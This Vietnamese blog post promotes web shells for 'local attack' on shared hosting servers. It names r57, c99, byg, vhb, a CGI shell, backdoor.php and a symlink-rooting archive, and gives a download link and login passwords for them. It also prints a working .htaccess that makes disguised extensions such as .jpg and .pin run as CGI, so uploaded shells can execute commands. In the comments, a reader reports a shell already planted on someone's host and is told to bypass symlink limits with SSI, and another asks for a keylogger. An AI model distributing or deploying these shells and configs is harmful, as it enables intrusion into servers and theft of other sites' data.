J2TEAM Security: A must-have extension for Chrome users. Install now!

Tổng hợp Shell và giới thiệu tính năng!

Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack.

Một số shell thông dụng:

r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.

c99.php
Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu!


byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng


pass login: byg
         
         vhb.php

     Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.
  
http://www.mediafire.com/?hr9acl1yd1eabcw 

    Pass login: vhb
soleil.pin
Nếu Server Safe_mod: ON,  cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.
 Pass login: ducdung.08clc
Cách sử dụng:
-          Up shell soleil.pin và CHMOD nó về 755
-          Up hoặc tạo file .htaccess có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin

telnet.php
Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần CHMOD nó về 755 là run ngon.

Fake symlink:
Get user:
Get user và domain
 
Shell này cần chmod về 755 trước khi sử dụng

Get all config
 
SSI
 
Backdoor.php
 
Netcut

zipcode.php
 
r57bypass.php (vip)
 
Check Shell : Kiểm tra shell có trên site
 
Priv8_2012.php
 
saoluu.php
Shell xml: Up shell đối với vbulletin
 
root.tar.gz: Dùng để symlink root hay indirect symlink.
* Và rất nhiều shell khác  với 1 số tính năng đặc biệt khác nữa.
...
Pass Unlock (all link): soleil_vhb
Nguồn: Hồ Đức Dũng's Blog
Hiệu chỉnh bởi Juno_okyo.
Leader at J2TEAM. Website: https://j2team.dev/

5 nhận xét

  1. Cho mình hỏi chút?
    Mình đã up được shell lên host, một số thông tin:
    Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
    Disable functions : system, exec, shell_exec, passthru, pcntl_exec, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, escapeshellcmd, escapeshellarg, dl, show_source,ini_alter, virtual, openlog, mail, symlink
    Uname -a: Linux srv2d151.vdrs.net 2.6.18-338.5.1.el5.lve0.8.25 #1 SMP Mon Mar 28 12:25:47 EEST 2011 x86_64
    Server: - id: 912(khn) - uid=912 (khn) gid=908(khn)
    - Nhưng mình lại không thể local được.
    - Bạn chỉ cho minh với nha, hay có book nào liên quan gửi cho mình với
    - Email mình: mythonestar@gmail.com

    - Và Blog của bạn mình không thấy mục bình luận mới nhất ở đâu, để tiện theo dõi?
    Thanks you so much!
    1. Chào bạn!
      Bạn có thể dùng chức năng Đăng kí qua Email ở dưới phần Nhận xét của bài viết này để nhận thông báo khi có comment mới.

      Về điều bạn hỏi: Server VDRS bạn có thể dùng SSI để bypass Symlink.
  2. Bạn có thể định nghĩa giúp mình bypass được không ?
  3. Bạn Juno_okyo cho mình hỏi có con shell nào có chức năng giống keylog.Có thể ghi lại thông tin người sử dụng trên máy không ?
    Bạn cho mình yahoo với
  4. bạn ơi cho mình hỏi đổi pass shell sao bạn
Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!